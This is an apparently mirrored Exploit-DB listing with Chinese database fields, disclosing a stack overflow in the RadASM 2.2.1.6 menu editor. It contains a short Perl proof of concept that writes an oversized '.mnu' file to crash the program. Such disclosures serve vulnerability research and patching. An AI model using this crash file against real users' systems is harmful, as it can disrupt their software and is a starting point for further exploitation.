https://www.exploit-db.com/exploits/9361
RadASM 2.2.1.6 Menu Editor - '.mnu' Stack Overflow (PoC)






漏洞ID | 1058083 | 漏洞类型 | |
发布时间 | 2009-08-04 | 更新时间 | 2009-08-04 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# RadASM 2.2.1.6 Menu Editor (.mnu) file stack overlow PoC
# Coded by Pankaj Kohli
# http://www.pank4j.com
$str="A"x146;
$file="sploit.mnu";
open(my $FILE, ">>$file") or die "Error opening file.n";
print $FILE $str ;
close($FILE);
print "$file has been created.n";
# milw0rm.com [2009-08-04]
检索漏洞
开始时间
结束时间